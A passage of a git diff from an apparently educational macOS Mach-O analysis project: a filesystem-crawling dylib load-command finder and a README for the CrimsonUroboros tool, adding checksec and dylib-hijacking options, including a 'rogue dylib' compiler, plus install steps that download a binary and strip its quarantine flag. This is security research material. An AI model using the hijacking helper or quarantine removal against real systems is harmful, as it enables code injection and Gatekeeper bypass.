        with open("MachODylibLoadCommandsFinder_results.txt", "a") as f:
            f.write(f"Total Mach-O files analyzed: {self.total_files_analyzed}\n")
            f.write("DYLIB-related LC counts:\n")
            for lc, count in self.dylib_counts.items():
                f.write(f"{lc}: {count}\n")
            for binary, dylibs in self.binary_dylibs.items():
                f.write(f"{binary}: {', '.join(dylibs)}\n")


# Script entry point: crawl the whole filesystem (slow; expects to be run with
# stderr silenced, e.g. 2>/dev/null, since LIEF logs non-Mach-O parse failures).
macho_checker = MachODylibLoadCommandsFinder()
macho_checker.parseDirectory("/")
macho_checker.print_results()
macho_checker.save_results()
\ No newline at end of file
diff --git a/README.md index 9a99237..17da578 100644 --- a/README.md +++ b/README.md @@ -23,17 +23,18 @@ Each article directory contains three subdirectories: Core program resulting from the Snake&Apple article series for binary analysis. You may find older versions of this script in each article directory in this repository.
* Usage ```console -usage: CrimsonUroboros [-h] -p PATH [--file_type] [--header_flags] [--endian] - [--header] [--load_commands] [--segments] [--sections] - [--symbols] [--chained_fixups] [--exports_trie] [--uuid] - [--main] [--strings_section] [--all_strings] - [--save_strings all_strings.txt] [--info] - [--verify_signature] [--cd_info] [--cd_requirements] - [--entitlements [human|xml|var]] - [--extract_cms cms_signature.der] - [--extract_certificates certificate_name] - [--remove_sig unsigned_binary] - [--sign_binary [adhoc|identity_number]] +usage: CrimsonUroboros [-h] -p PATH [--file_type] [--header_flags] [--endian] [--header] [--load_commands] [--segments] + [--sections] [--symbols] [--chained_fixups] [--exports_trie] [--uuid] [--main] + [--encryption_info [(optional) save_path.bytes]] [--strings_section] [--all_strings] + [--save_strings all_strings.txt] [--info] [--verify_signature] [--cd_info] [--cd_requirements] + [--entitlements [human|xml|var]] [--extract_cms cms_signature.der] + [--extract_certificates certificate_name] [--remove_sig unsigned_binary] + [--sign_binary [adhoc|identity_number]] [--has_pie] [--has_arc] [--is_stripped] [--has_canary] + [--has_nx_stack] [--has_nx_heap] [--has_xn] [--is_notarized] [--is_encrypted] [--has_restrict] + [--is_hr] [--is_as] [--is_fort] [--has_rpath] [--checksec] [--dylibs] [--rpaths] [--rpaths_u] + [--dylibs_paths] [--dylibs_paths_u] [--broken_relative_paths] + [--dylibtree [cache_path,output_path,is_extracted]] [--dylib_id] [--reexport_paths] [--hijack_sec] + [--dylib_hijacking [cache_path]] [--prepare_dylib [target_dylib_path]] Mach-O files parser for binary analysis @@ -54,36 +55,77 @@ MACH-O ARGS: --exports_trie Print Export Trie information --uuid Print UUID --main Print entry point and stack size + --encryption_info [(optional) save_path.bytes] + Print encryption info if any. 
Optionally specify an output path to dump the encrypted data (if + cryptid=0, data will be in plain text) --strings_section Print strings from __cstring section --all_strings Print strings from all sections --save_strings all_strings.txt - Parse all sections, detect strings, and save them to a - file - --info Print header, load commands, segments, sections, - symbols, and strings + Parse all sections, detect strings, and save them to a file + --info Print header, load commands, segments, sections, symbols, and strings CODE SIGNING ARGS: - --verify_signature Code Signature verification (if the contents of the - binary have been modified) + --verify_signature Code Signature verification (if the contents of the binary have been modified) --cd_info Print Code Signature information --cd_requirements Print Code Signature Requirements --entitlements [human|xml|var] - Print Entitlements in a human-readable, XML, or DER - format (default: human) + Print Entitlements in a human-readable, XML, or DER format (default: human) --extract_cms cms_signature.der - Extract CMS Signature from the Code Signature and save - it to a given file + Extract CMS Signature from the Code Signature and save it to a given file --extract_certificates certificate_name - Extract Certificates and save them to a given file. To - each filename will be added an index at the end: _0 for - signing, _1 for intermediate, and _2 for root CA - certificate + Extract Certificates and save them to a given file. To each filename will be added an index at + the end: _0 for signing, _1 for intermediate, and _2 for root CA certificate --remove_sig unsigned_binary Save the new file on a disk with removed signature --sign_binary [adhoc|identity_number] - Sign binary using specified identity - use : 'security - find-identity -v -p codesigning' to get the identity. 
- (default: adhoc) + Sign binary using specified identity - use : 'security find-identity -v -p codesigning' to get + the identity (default: adhoc) + +CHECKSEC ARGS: + --has_pie Check if Position-Independent Executable (PIE) is set + --has_arc Check if Automatic Reference Counting (ARC) is in use (can be false positive) + --is_stripped Check if binary is stripped + --has_canary Check if Stack Canary is in use (can be false positive) + --has_nx_stack Check if stack is non-executable (NX stack) + --has_nx_heap Check if heap is non-executable (NX heap) + --has_xn Check if binary is protected by eXecute Never (XN) ARM protection + --is_notarized Check if the application is notarized and can pass the Gatekeeper verification + --is_encrypted Check if the application is encrypted (has LC_ENCRYPTION_INFO(_64) and cryptid set to 1) + --has_restrict Check if binary has __RESTRICT segment + --is_hr Check if the Hardened Runtime is in use + --is_as Check if the App Sandbox is in use + --is_fort Check if the binary is fortified + --has_rpath Check if the binary utilise any @rpath variables + --checksec Run all checksec module options on the binary + +DYLIBS ARGS: + --dylibs Print shared libraries used by specified binary with compatibility and the current version + (loading paths unresolved, like @rpath/example.dylib) + --rpaths Print all paths (resolved) that @rpath can be resolved to + --rpaths_u Print all paths (unresolved) that @rpath can be resolved to + --dylibs_paths Print absolute dylib loading paths (resolved @rpath|@executable_path|@loader_path) in order they + are searched for + --dylibs_paths_u Print unresolved dylib loading paths. + --broken_relative_paths + Print 'broken' relative paths from the binary (cases where the dylib source is specified for an + executable directory without @executable_path) + --dylibtree [cache_path,output_path,is_extracted] + Print the dynamic dependencies of a Mach-O binary recursively. 
You can specify the Dyld Shared + Cache path in the first argument, the output directory as the 2nd argument, and if you have + already extracted DSC in the 3rd argument (0 or 1). The output_path will be used as a base for + dylibtree. For example, to not extract DSC, use: --dylibs ",,1", or to extract from default to + default use just --dylibs or --dylibs ",,0" which will extract DSC to extracted_dyld_share_cache/ + in the current directory + --dylib_id Print path from LC_ID_DYLIB + --reexport_paths Print paths from LC_REEXPORT_DYLIB + --hijack_sec Check if binary is protected against Dylib Hijacking + --dylib_hijacking [cache_path] + Check for possible Direct and Indirect Dylib Hijacking loading paths. (optional) Specify the path + to the Dyld Shared Cache + --prepare_dylib [target_dylib_path] + Compile rogue dylib. (optional) Specify target_dylib_path, it will search for the imported + symbols from it in the dylib specified in the --path argument and automatically add it to the + source code of the rogue lib. Example: --path lib1.dylib --prepare_dylib /path/to/lib2.dylib ``` * Example: ```bash @@ -216,17 +258,28 @@ LCFinder -l macho_paths.txt --lc SEGMENT_64 2>/dev/null LCFinder -p hello --lc lc_segment_64 2>/dev/null ``` *** +### [MachODylibLoadCommandsFinder](IV.%20Dylibs/python/MachODylibLoadCommandsFinder.py) +Designed to recursively crawl the system and parse Mach-O files to find DYLIB-related load commands.
+Print the total Mach-O files analyzed and how many DYLIB-related LCs existed +* Usage: +```console +MachODylibLoadCommandsFinder 2>/dev/null +``` + ## INSTALL ``` pip -r requirements.txt -python3 -m pip install pyimg4 wget https://github.com/CRKatri/trustcache/releases/download/v2.0/trustcache_macos_arm64 -O /usr/local/bin/trustcache chmod +x /usr/local/bin/trustcache xattr -d com.apple.quarantine /usr/local/bin/trustcache +brew install keith/formulae/dyld-shared-cache-extractor ``` ## LIMITATIONS * Codesigning module(codesign wrapper) works only on macOS. +* `--dylib_hijacking` needs [ipsw](https://github.com/blacktop/ipsw) to be installed. +* `--dylibtree` needs the [dyld-shared-cache-extractor](https://github.com/keith/dyld-shared-cache-extractor) to be installed. + ## WHY UROBOROS? I will write the code for each article as a class SnakeX, where X will be the article number. To make it easier for the audience to follow. Each Snake class will be a child of the previous one and infinitely "eat itself" (inherit methods of the previous class), like Uroboros. @@ -236,9 +289,12 @@ I will write the code for each article as a class SnakeX, where X will be the ar * [XNU](https://github.com/apple-oss-distributions/xnu) * [dyld](https://github.com/apple-oss-distributions/dyld) -## TODO +## TODO - IDEAS / IMPROVES * DER Entitlements converter method - currently, only the `convert_xml_entitlements_to_dict()` method exists. I need to create a Python parser for DER-encoded entitlements. * SuperBlob parser - to find other blobs in Code Signature. * Entitlements Blob parser - to check if XML and DER blobs exist. * Every method in the Snake class that use Entitlements should parse first XML > DER (currently, only XML parser exists) -* After making a SuperBlob parser and CodeDirectory blob parser, modify hasHardenedRuntime to check Runtime flag by using bitmask, instead of string. 
\ No newline at end of file +* After making a SuperBlob parser and CodeDirectory blob parser, modify hasHardenedRuntime to check Runtime flag by using bitmask, instead of string. +* Build Dyld Shared Cache parser and extractor to make SnakeIV independent of dyld-shared-cache-extractor. +* Add check for `CS_RESTRICT` (`0x800`) in `--checksec` to `RESTRICTED` +* Add check for `DYLIB HIJACKING` to `--checksec` \ No newline at end of file